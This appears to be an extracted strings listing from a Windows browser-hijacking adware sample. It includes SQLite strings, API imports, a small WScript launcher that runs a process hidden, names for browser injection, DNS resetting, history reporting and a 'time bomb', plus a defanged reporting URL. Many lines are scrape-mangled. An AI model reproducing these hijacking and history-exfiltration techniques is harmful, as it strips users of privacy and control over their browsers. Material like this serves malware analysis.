UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q

UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q

sqlite_stat1

sqlite_stat1

sqlite_altertab_%s

sqlite_altertab_%s

CREATE TABLE %Q.%s(%s)

CREATE TABLE %Q.%s(%s)

DELETE FROM %Q.%s WHERE tbl=%Q

DELETE FROM %Q.%s WHERE tbl=%Q

invalid name: "%s"

invalid name: "%s"

SELECT idx, stat FROM %Q.sqlite_stat1

SELECT idx, stat FROM %Q.sqlite_stat1

too many attached databases - max %d

too many attached databases - max %d

database %s is already in use

database %s is already in use

unable to open database: %s

unable to open database: %s

cannot detach database %s

cannot detach database %s

no such database: %s

no such database: %s

database %s is locked

database %s is locked

sqlite_attach

sqlite_attach

sqlite_detach

sqlite_detach

%s %T cannot reference objects in database %s

%s %T cannot reference objects in database %s

access to %s.%s is prohibited

access to %s.%s is prohibited

access to %s.%s.%s is prohibited

access to %s.%s.%s is prohibited

object name reserved for internal use: %s

object name reserved for internal use: %s

too many columns on %s

too many columns on %s

there is already an index named %s

there is already an index named %s

default value of column [%s] is not constant

default value of column [%s] is not constant

duplicate column name: %s

duplicate column name: %s

AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY

AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY

table "%s" has more than one primary key

table "%s" has more than one primary key

no such collation sequence: %s

no such collation sequence: %s

UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d

UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d

CREATE %s %.*s

CREATE %s %.*s

CREATE TABLE %Q.sqlite_sequence(name,seq)

CREATE TABLE %Q.sqlite_sequence(name,seq)

view %s is circularly defined

view %s is circularly defined

table %s may not be dropped

table %s may not be dropped

UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d

UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d

use DROP VIEW to delete view %s

use DROP VIEW to delete view %s

use DROP TABLE to delete table %s

use DROP TABLE to delete table %s

DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'

DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'

DELETE FROM %s.sqlite_sequence WHERE name=%Q

DELETE FROM %s.sqlite_sequence WHERE name=%Q

foreign key on %s should reference only one column of table %T

foreign key on %s should reference only one column of table %T

DELETE FROM %Q.sqlite_stat1 WHERE tbl=%Q

DELETE FROM %Q.sqlite_stat1 WHERE tbl=%Q

unknown column "%s" in foreign key definition

unknown column "%s" in foreign key definition

number of columns in foreign key does not match the number of columns in the referenced table

number of columns in foreign key does not match the number of columns in the referenced table

indexed columns are not unique

indexed columns are not unique

table %s may not be indexed

table %s may not be indexed

virtual tables may not be indexed

virtual tables may not be indexed

views may not be indexed

views may not be indexed

index %s already exists

index %s already exists

there is already a table named %s

there is already a table named %s

table %s has no column named %s

table %s has no column named %s

sqlite_autoindex_%s_%d

sqlite_autoindex_%s_%d

INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);

INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);

CREATE%s INDEX %.*s

CREATE%s INDEX %.*s

no such index: %S

no such index: %S

DELETE FROM %Q.%s WHERE name=%Q

DELETE FROM %Q.%s WHERE name=%Q

index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped

index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped

DELETE FROM %Q.sqlite_stat1 WHERE idx=%Q

DELETE FROM %Q.sqlite_stat1 WHERE idx=%Q

a JOIN clause is required before %s

a JOIN clause is required before %s

unable to identify the object to be reindexed

unable to identify the object to be reindexed

cannot modify %s because it is a view

cannot modify %s because it is a view

table %s may not be modified

table %s may not be modified

sqlite_source_id

sqlite_source_id

sqlite_version

sqlite_version

sqlite_compileoption_get

sqlite_compileoption_get

sqlite_compileoption_used

sqlite_compileoption_used

foreign key mismatch

foreign key mismatch

table %S has %d columns but %d values were supplied

table %S has %d columns but %d values were supplied

table %S has no column named %s

table %S has no column named %s

%d values for %d columns

%d values for %d columns

%s.%s may not be NULL

%s.%s may not be NULL

PRIMARY KEY must be unique

PRIMARY KEY must be unique

sqlite3_extension_init

sqlite3_extension_init

no entry point [%s] in shared library [%s]

no entry point [%s] in shared library [%s]

unable to open shared library [%s]

unable to open shared library [%s]

automatic extension loading failed: %s

automatic extension loading failed: %s

error during initialization: %s

error during initialization: %s

foreign_keys

foreign_keys

foreign_key_list

foreign_key_list

*** in database %s ***

*** in database %s ***

unsupported encoding: %s

unsupported encoding: %s

malformed database schema (%s)

malformed database schema (%s)

%s - %s

%s - %s

SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid

SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid

unsupported file format

unsupported file format

database schema is locked: %s

database schema is locked: %s

RIGHT and FULL OUTER JOINs are not currently supported

RIGHT and FULL OUTER JOINs are not currently supported

unknown or unsupported join type: %T %T%s%T

unknown or unsupported join type: %T %T%s%T

cannot have both ON and USING clauses in the same join

cannot have both ON and USING clauses in the same join

a NATURAL join may not have an ON or USING clause

a NATURAL join may not have an ON or USING clause

cannot join using column %s - column not present in both tables

cannot join using column %s - column not present in both tables

%s.%s

%s.%s

ORDER BY clause should come after %s not before

ORDER BY clause should come after %s not before

%s:%d

%s:%d

SELECTs to the left and right of %s do not have the same number of result columns

SELECTs to the left and right of %s do not have the same number of result columns

LIMIT clause should come after %s not before

LIMIT clause should come after %s not before

sqlite_subquery_%p_

sqlite_subquery_%p_

no such index: %s

no such index: %s

no such table: %s

no such table: %s

sqlite3_get_table() called with two or more incompatible queries

sqlite3_get_table() called with two or more incompatible queries

cannot create %s trigger on view: %S

cannot create %s trigger on view: %S

INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')

INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')

cannot create INSTEAD OF trigger on table: %S

cannot create INSTEAD OF trigger on table: %S

no such trigger: %S

no such trigger: %S

no such column: %s

no such column: %s

-- TRIGGER %s

-- TRIGGER %s

PRAGMA vacuum_db.synchronous=OFF

PRAGMA vacuum_db.synchronous=OFF

SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'

SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'

SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'

SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'

SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0

INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)

INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';

UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d

UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d

vtable constructor did not declare schema: %s

vtable constructor did not declare schema: %s

vtable constructor failed: %s

vtable constructor failed: %s

no such module: %s

no such module: %s

at most %d tables in a join

at most %d tables in a join

table %s: xBestIndex returned an invalid plan

table %s: xBestIndex returned an invalid plan

TABLE %s

TABLE %s

cannot use index: %s

cannot use index: %s

%s WITH AUTOMATIC INDEX

%s WITH AUTOMATIC INDEX

%s AS %s

%s AS %s

%s VIA MULTI-INDEX UNION

%s VIA MULTI-INDEX UNION

%s WITH INDEX %s

%s WITH INDEX %s

%s VIRTUAL TABLE INDEX %d:%s

%s VIRTUAL TABLE INDEX %d:%s

%s USING PRIMARY KEY

%s USING PRIMARY KEY

%s ORDER BY

%s ORDER BY

the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers

the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers

the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers

the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers

SHELL32.dll

SHELL32.dll

SHLWAPI.dll

SHLWAPI.dll

GetProcessHeap

GetProcessHeap

KERNEL32.dll

KERNEL32.dll

USER32.dll

USER32.dll

RegOpenKeyExA

RegOpenKeyExA

RegCloseKey

RegCloseKey

RegOpenKeyExW

RegOpenKeyExW

ADVAPI32.dll

ADVAPI32.dll

ole32.dll

ole32.dll

OLEAUT32.dll

OLEAUT32.dll

WinHttpReceiveResponse

WinHttpReceiveResponse

WinHttpSendRequest

WinHttpSendRequest

WinHttpConnect

WinHttpConnect

WinHttpCloseHandle

WinHttpCloseHandle

WinHttpQueryDataAvailable

WinHttpQueryDataAvailable

WinHttpOpen

WinHttpOpen

WinHttpOpenRequest

WinHttpOpenRequest

WinHttpReadData

WinHttpReadData

WinHttpGetIEProxyConfigForCurrentUser

WinHttpGetIEProxyConfigForCurrentUser

WINHTTP.dll

WINHTTP.dll

GetExtendedTcpTable

GetExtendedTcpTable

IPHLPAPI.DLL

IPHLPAPI.DLL

WS2_32.dll

WS2_32.dll

PSAPI.DLL

PSAPI.DLL

WTSAPI32.dll

WTSAPI32.dll

Secur32.dll

Secur32.dll

CryptMsgClose

CryptMsgClose

CertGetNameStringW

CertGetNameStringW

CertFreeCertificateContext

CertFreeCertificateContext

CertFindCertificateInStore

CertFindCertificateInStore

CertCloseStore

CertCloseStore

CryptMsgGetParam

CryptMsgGetParam

CRYPT32.dll

CRYPT32.dll

USERENV.dll

USERENV.dll

HttpSendRequestExW

HttpSendRequestExW

HttpSendRequestW

HttpSendRequestW

HttpAddRequestHeadersW

HttpAddRequestHeadersW

HttpQueryInfoW

HttpQueryInfoW

HttpOpenRequestW

HttpOpenRequestW

HttpEndRequestW

HttpEndRequestW

WININET.dll

WININET.dll

CreatePipe

CreatePipe

ConnectNamedPipe

ConnectNamedPipe

CreateNamedPipeW

CreateNamedPipeW

DisconnectNamedPipe

DisconnectNamedPipe

GetNamedPipeInfo

GetNamedPipeInfo

GetCPInfo

GetCPInfo

RegCreateKeyW

RegCreateKeyW

RegCreateKeyExW

RegCreateKeyExW

RegOpenKeyW

RegOpenKeyW

RegQueryInfoKeyW

RegQueryInfoKeyW

RegDeleteKeyA

RegDeleteKeyA

RegDeleteKeyW

RegDeleteKeyW

RegEnumKeyExA

RegEnumKeyExA

RegCreateKeyA

RegCreateKeyA

RegCreateKeyExA

RegCreateKeyExA

RegQueryInfoKeyA

RegQueryInfoKeyA

RegOpenKeyA

RegOpenKeyA

RegEnumKeyExW

RegEnumKeyExW

RegEnumKeyW

RegEnumKeyW

zcÁ

zcÁ

[email protected]@[email protected]@@

[email protected]@[email protected]@@

[email protected]@[email protected]@

[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@@

[email protected]@[email protected]@@

[email protected]@[email protected]@

[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@@

[email protected]@[email protected]@[email protected]@@

[email protected]@

[email protected]@

[email protected]@[email protected]@

[email protected]@[email protected]@

[email protected]@[email protected]@@

[email protected]@[email protected]@@

[email protected]@[email protected]@@

[email protected]@[email protected]@@

[email protected]@[email protected]@

[email protected]@[email protected]@

[email protected]@

[email protected]@

[email protected]@[email protected]@

[email protected]@[email protected]@

[email protected]@@

[email protected]@@

[email protected]@[email protected]@@

[email protected]@[email protected]@@

[email protected]@[email protected]@@

[email protected]@[email protected]@@

[email protected]@[email protected]@

[email protected]@[email protected]@

[email protected]@[email protected]@@

[email protected]@[email protected]@@

[email protected]@[email protected]@@

[email protected]@[email protected]@@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@

[email protected]@[email protected]@

[email protected]@[email protected]@

[email protected]@[email protected]@

[email protected]@[email protected]@@

[email protected]@[email protected]@@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@Speed[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@@

[email protected]@[email protected]@@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@[email protected]@

[email protected]@[email protected]@

[email protected]@[email protected]@

[email protected]@[email protected]@@

[email protected]@[email protected]@@

[email protected]@[email protected]@@

[email protected]@[email protected]@@

[email protected]@[email protected]@@

[email protected]@[email protected]@@

[email protected]@[email protected]@

[email protected]@[email protected]@

[email protected]@[email protected]@@

[email protected]@[email protected]@@

[email protected]@[email protected]@

[email protected]@[email protected]@

if (WScript.Arguments.length > 0)

if (WScript.Arguments.length > 0)

var root = WScript.Arguments(0);

var root = WScript.Arguments(0);

for (var i = 1, n = WScript.Arguments.length; i

for (var i = 1, n = WScript.Arguments.length; i

args.push(WScript.Arguments(i));

args.push(WScript.Arguments(i));

var path = "\"" root.replace(/\\*$/, "").replace(/\//g, "\\") "\"";

var path = "\"" root.replace(/\\*$/, "").replace(/\//g, "\\") "\"";

path = " \"" args.join("\" \"") "\"";

path = " \"" args.join("\" \"") "\"";

var shell = WScript.CreateObject("WScript.Shell");

var shell = WScript.CreateObject("WScript.Shell");

shell.Run(path, 0, false);

shell.Run(path, 0, false);

1(1-1F1S1X1n1}1

1(1-1F1S1X1n1}1

[email protected]\1

[email protected]\1

040;0_0~0

040;0_0~0

?%?)?.?3?>?

?%?)?.?3?>?

88

88

=2=9=`=->:>

=2=9=`=->:>

0"161\1}1

0"161\1}1

1!1)141=1

1!1)141=1

8"9(9,90949

8"9(9,90949

>[email protected]?

>[email protected]?

2 2$2(2,272

2 2$2(2,272

:%:,:2:8:

:%:,:2:8:

4 4$4(4,4044484

4 4$4(4,4044484

$5(5,5054585

$5(5,5054585

; ;$;(;,;0;4;8;

; ;$;(;,;0;4;8;

> >$>(>,>0>4>8>

> >$>(>,>0>4>8>

? ?,?0?4?8?

? ?,?0?4?8?

,0004080

,0004080

6 6$6(6,6

6 6$6(6,6

7 7(707

7 7(707

combase.dll

combase.dll

kernel32.dll

kernel32.dll

mscoree.dll

mscoree.dll

- floating point support not loaded

- floating point support not loaded

- CRT not initialized

- CRT not initialized

- Attempt to initialize the CRT more than once.

- Attempt to initialize the CRT more than once.

portuguese-brazilian

portuguese-brazilian

USER32.DLL

USER32.DLL

Injection::Snapshot::Controller::IsChromeInstalled

Injection::Snapshot::Controller::IsChromeInstalled

Chrome installed:

Chrome installed:

Injection::Snapshot::Controller::IsFirefoxInstalled

Injection::Snapshot::Controller::IsFirefoxInstalled

Firefox installed:

Firefox installed:

Chrome unchanged:

Chrome unchanged:

Firefox unchanged:

Firefox unchanged:

Checking

Checking

Checking

Checking

777705555443332

777705555443332

5555443332

5555443332

5555443332

5555443332

logs\${ModuleName}.${Pid}.log

logs\${ModuleName}.${Pid}.log

WatchmanKey::TimeBomb::UninstallTimeBomb

WatchmanKey::TimeBomb::UninstallTimeBomb

Reporting

Reporting

ChromeExtensionMonitorWorkerThread started

ChromeExtensionMonitorWorkerThread started

ChromeExtensionMonitor::CollectExtensionInfo

ChromeExtensionMonitor::CollectExtensionInfo

ChromeExtensionMonitor::CheckExtension

ChromeExtensionMonitor::CheckExtension

8Reset DNS to 8.8.8.8 for adapter

8Reset DNS to 8.8.8.8 for adapter

WinHTTP Example/1.0

WinHTTP Example/1.0

VVV.google.com

VVV.google.com

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows

Registry::Helper::RegOpenKeyExA

Registry::Helper::RegOpenKeyExA

Chrome::StartPageProtectionEnabled

Chrome::StartPageProtectionEnabled

Chrome::SearchEngineProtectionEnabled

Chrome::SearchEngineProtectionEnabled

Chrome::RestoreOnStartupProtectionEnabled

Chrome::RestoreOnStartupProtectionEnabled

Chrome::StartPageProtectionDisabled

Chrome::StartPageProtectionDisabled

Chrome::SearchEngineProtectionDisabled

Chrome::SearchEngineProtectionDisabled

Chrome::RestoreOnStartupProtectionDisabled

Chrome::RestoreOnStartupProtectionDisabled

Firefox::StartPageChangedByUser

Firefox::StartPageChangedByUser

Firefox::SearchEngineChangedByUser

Firefox::SearchEngineChangedByUser

Explorer.HomePageEvent:

Explorer.HomePageEvent:

Explorer.SearchEngineEvent:

Explorer.SearchEngineEvent:

Firefox.HomePageEvent:

Firefox.HomePageEvent:

Firefox.SearchEngineEvent:

Firefox.SearchEngineEvent:

ProcessCatcher::ExecutionContext::Resume

ProcessCatcher::ExecutionContext::Resume

Allocation

Allocation

iexplore.exe

iexplore.exe

rundll32.exe

rundll32.exe

chrome.exe

chrome.exe

firefox.exe

firefox.exe

opera.exe

opera.exe

safari.exe

safari.exe

navigator.exe

navigator.exe

torch.exe

torch.exe

U.exe

U.exe

epic.exe

epic.exe

browser.exe

browser.exe

Maxthon.exe

Maxthon.exe

sbframe.exe

sbframe.exe

avant.exe

avant.exe

dragon.exe

dragon.exe

bobrowser.exe

bobrowser.exe

crossbrowse.exe

crossbrowse.exe

vosteran.exe

vosteran.exe

ProcessMonitor::ExecutionContext::Resume

ProcessMonitor::ExecutionContext::Resume

E:\iexplore.exe|E:\rundll32.exe

E:\iexplore.exe|E:\rundll32.exe

E:\chrome.exe

E:\chrome.exe

E:\firefox.exe

E:\firefox.exe

E:\opera.exe

E:\opera.exe

E:\Safari.exe|E:\crossbrowse.exe|E:\torch.exe|E:\U.exe|E:\epic.exe|E:\vosteran.exe|E:\browser.exe|E:\avant.exe|E:\bobrowser.exe

E:\Safari.exe|E:\crossbrowse.exe|E:\torch.exe|E:\U.exe|E:\epic.exe|E:\vosteran.exe|E:\browser.exe|E:\avant.exe|E:\bobrowser.exe

smci32.dll

smci32.dll

smi32.exe

smi32.exe

Utils::PipedProcess::Create

Utils::PipedProcess::Create

Utils::PipedProcess::Start

Utils::PipedProcess::Start

Utils::PipedProcess::WriteData

Utils::PipedProcess::WriteData

[ReportDllsThread]

[ReportDllsThread]

ProcessWatcher::ExecutionContext::Resume

ProcessWatcher::ExecutionContext::Resume

Local proxy port:

Local proxy port:

127.0.0.1

127.0.0.1

[ProxyMonitor::getProcessByPort]

[ProxyMonitor::getProcessByPort]

Failed to get GetExtendedTcpTable

Failed to get GetExtendedTcpTable

smei32.dll

smei32.dll

[ReportBuilder::MakeDefaultBrowserSettingsElement]

[ReportBuilder::MakeDefaultBrowserSettingsElement]

[ReportBuilder::CalculateHash]

[ReportBuilder::CalculateHash]

Result.Hash:

Result.Hash:

[ReportBuilder::MakeHistoryReport]

[ReportBuilder::MakeHistoryReport]

Building history report...

Building history report...

ReportBuilder::GetWMISystemInfo

ReportBuilder::GetWMISystemInfo

ReportBuilder::GetExplorerBrowserInfo

ReportBuilder::GetExplorerBrowserInfo

ReportBuilder::GetChromeBrowserInfo

ReportBuilder::GetChromeBrowserInfo

. Chrome Search:

. Chrome Search:

History Report:

History Report:

[ReportBuilder::MakeReport]

[ReportBuilder::MakeReport]

Report:

Report:

[ReportBuilder::GetExplorerBrowserInfo]

[ReportBuilder::GetExplorerBrowserInfo]

[ReportBuilder::GetChromeBrowserInfo]

[ReportBuilder::GetChromeBrowserInfo]

Chrome::BrowserInfo::Factory::Create

Chrome::BrowserInfo::Factory::Create

Chrome::BrowserInfo::Factory::GetInfo

Chrome::BrowserInfo::Factory::GetInfo

sma.exe

sma.exe

Utils::PipedProcess::ReadData

Utils::PipedProcess::ReadData

Utils::PipedProcess::Wait

Utils::PipedProcess::Wait

Utils::PipedProcess::WriteEof

Utils::PipedProcess::WriteEof

Utils::MachineKey::Create

Utils::MachineKey::Create

Utils::MachineKey::Generate

Utils::MachineKey::Generate

Encrypt data. Key:

Encrypt data. Key:

Decrypt data. Key:

Decrypt data. Key:

ReportBuilder::MakeInstallReport

ReportBuilder::MakeInstallReport

[ServerReporter::SendInstallReport]

[ServerReporter::SendInstallReport]

ReportBuilder::MakeUninstallReport

ReportBuilder::MakeUninstallReport

[ServerReporter::SendUninstallReport]

[ServerReporter::SendUninstallReport]

ReportBuilder::MakeRegulatReport

ReportBuilder::MakeRegulatReport

[ServerReporter::SendRegularReport]

[ServerReporter::SendRegularReport]

ReportBuilder::MakeUserActionReport

ReportBuilder::MakeUserActionReport

[ServerReporter::SendUserActionReport]

[ServerReporter::SendUserActionReport]

ReportBuilder::MakeHistoryReport

ReportBuilder::MakeHistoryReport

[ServerReporter::SendHistoryReport]

[ServerReporter::SendHistoryReport]

ServerReporter::MakeReport

ServerReporter::MakeReport

ServerReporter::SendReport

ServerReporter::SendReport

[ServerReporter::SendReport]

[ServerReporter::SendReport]

ServerEncryption::CreateSessionKey

ServerEncryption::CreateSessionKey

Report in Base 64:

Report in Base 64:

10D2FBE6-2346-4627-A9F5-FB48313C5001

10D2FBE6-2346-4627-A9F5-FB48313C5001

ServerReporter::Implementation::GetTargetUrl - User GUID is problematic GUID (hardcoded/unknown)

ServerReporter::Implementation::GetTargetUrl - User GUID is problematic GUID (hardcoded/unknown)

ServerReporter::Implementation::GetTargetUrl - Failed replacing problematic GUID with new one

ServerReporter::Implementation::GetTargetUrl - Failed replacing problematic GUID with new one

[ServerReporter::GetUserProfile]

[ServerReporter::GetUserProfile]

[ServerReporter::MakeReport]

[ServerReporter::MakeReport]

ServerReporter::GetUserProfile

ServerReporter::GetUserProfile

ReportBuilder::Create

ReportBuilder::Create

Result.Report:

Result.Report:

[ServerReporter::SetLastReportTime]

[ServerReporter::SetLastReportTime]

WatchmanKey::Reporter::SetLastTime

WatchmanKey::Reporter::SetLastTime

Package url:

Package url:

WatchmanKey::Updater::SetLastTime

WatchmanKey::Updater::SetLastTime

.Service

.Service

\Microsoft\Windows\Start Menu

\Microsoft\Windows\Start Menu

*.lnk

*.lnk

\Internet Explorer\iexplore.exe

\Internet Explorer\iexplore.exe

\Safari\Safari.exe

\Safari\Safari.exe

/report

/report

/report1

/report1

%d.%d.%d.%d%n

%d.%d.%d.%d%n

Created URL Set object from configuration. Name:

Created URL Set object from configuration. Name:

UrlSetID:

UrlSetID:

Could not find matching URL set... Using old configuration

Could not find matching URL set... Using old configuration

[LocalScope::UpdateParser::ParseReportSection]

[LocalScope::UpdateParser::ParseReportSection]

Monitor::ServerEncryption::CreateSessionKey

Monitor::ServerEncryption::CreateSessionKey

Full url:

Full url:

Data url:

Data url:

sbu.exe

sbu.exe

smw.sys

smw.sys

wscript.exe

wscript.exe

smhe.js

smhe.js

[Monitor::WatchmanGuard::SendReport]

[Monitor::WatchmanGuard::SendReport]

InstallReporter

InstallReporter

Monitor::ServerReporter::Create

Monitor::ServerReporter::Create

Monitor::ServerReporter::SendInitialReport

Monitor::ServerReporter::SendInitialReport

/urlset:

/urlset:

Options.InjectAllBrowsers:

Options.InjectAllBrowsers:

Options.InjectDefaultOnly:

Options.InjectDefaultOnly:

Options.ServiceName:

Options.ServiceName:

Options.ProductCode:

Options.ProductCode:

Options.ProductPriority:

Options.ProductPriority:

Options.EnablePinner:

Options.EnablePinner:

Options.EnableRedirect:

Options.EnableRedirect:

Options.EnableYellowBandSuppression:

Options.EnableYellowBandSuppression:

Options.UpdateUrl:

Options.UpdateUrl:

Options.ReportUrl:

Options.ReportUrl:

Options.AutoStart:

Options.AutoStart:

Options.ProtectSearch:

Options.ProtectSearch:

Options.ProtectHome:

Options.ProtectHome:

Options.ProtectTab:

Options.ProtectTab:

Options.ExplorerInjection:

Options.ExplorerInjection:

Options.ChromeInjection:

Options.ChromeInjection:

Options.FirefoxInjection:

Options.FirefoxInjection:

Options.OperaInjection:

Options.OperaInjection:

Options.ConfigPath:

Options.ConfigPath:

Options.ConfigKey:

Options.ConfigKey:

Getting current URL Set

Getting current URL Set

Getting URL Set from options

Getting URL Set from options

] Provided. And is different from current URL set [

] Provided. And is different from current URL set [

URL Set [

URL Set [

general_config.xml

general_config.xml

system_config.xml

system_config.xml

[WatchmanInstaller::SendReport1]

[WatchmanInstaller::SendReport1]

iexplore.exe is running, result for getting DLL's:

iexplore.exe is running, result for getting DLL's:

firefox.exe is running, result for getting DLL's:

firefox.exe is running, result for getting DLL's:

chrome.exe is running, result for getting DLL's:

chrome.exe is running, result for getting DLL's:

ServerReporter::Create

ServerReporter::Create

URL to use:

URL to use:

ServerReporter::SendRegularReport

ServerReporter::SendRegularReport

[WatchmanInstaller::SendReport]

[WatchmanInstaller::SendReport]

Currently set URLSet:

Currently set URLSet:

Updating system config with new URL set...

Updating system config with new URL set...

Already reported duiring first install

Already reported duiring first install

Report' been sent:

Report' been sent:

WatchmanInstaller::SendReport1

WatchmanInstaller::SendReport1

calling SendReport1...

calling SendReport1...

WatchmanInstaller::SendReport

WatchmanInstaller::SendReport

[Monitor::WatchmanMonitor::CreateSendReportTask]

[Monitor::WatchmanMonitor::CreateSendReportTask]

SendReportTask

SendReportTask

new

new

[Monitor::WatchmanMonitor::OnSendReportSucceeded]

[Monitor::WatchmanMonitor::OnSendReportSucceeded]

[Monitor::WatchmanMonitor::OnSendReportFailed]

[Monitor::WatchmanMonitor::OnSendReportFailed]

Need to send report!!!

Need to send report!!!

Original report URL:

Original report URL:

ServerReporter::SendInitialReport

ServerReporter::SendInitialReport

[Monitor::WatchmanMonitor::OnChromeProtectionChanged]

[Monitor::WatchmanMonitor::OnChromeProtectionChanged]

User has changed the chrome protection for:

User has changed the chrome protection for:

[Monitor::WatchmanMonitor::OnResetFirefoxProtection]

[Monitor::WatchmanMonitor::OnResetFirefoxProtection]

User has reset the firefox protection:

User has reset the firefox protection:

Next report task:

Next report task:

Scheduller::RegisterTask

Scheduller::RegisterTask

Monitor::Application::EnsureSystemKey

Monitor::Application::EnsureSystemKey

Options.Revert:

Options.Revert:

Settings.Final:

Settings.Final:

ADVAPI32.DLL

ADVAPI32.DLL

shlwapi.dll

shlwapi.dll

Utils::Registry::OpenKeyExW

Utils::Registry::OpenKeyExW

Subkey:

Subkey:

[Utils::Registry::RecursiveDeleteKeyW]

[Utils::Registry::RecursiveDeleteKeyW]

SHLWAPI.GetAddressOf

SHLWAPI.GetAddressOf

WKERNEL32.DLL

WKERNEL32.DLL

VERSION.DLL

VERSION.DLL

hXXp://d1y2jryd6u59ns.cloudfront.net/p.ashx

hXXp://d1y2jryd6u59ns.cloudfront.net/p.ashx

\\.\pipe\

\\.\pipe\

Could not create thread event. %%s

Could not create thread event. %%s

Could not create new client event. %%s

Could not create new client event. %%s

Could not create accept thread. %%s

Could not create accept thread. %%s

Could not create work thread. %%s

Could not create work thread. %%s

Could not start thread. %%s

Could not start thread. %%s

Stop IPC error. %%s

Stop IPC error. %%s

Pipe (0x%X) read problems. %%s

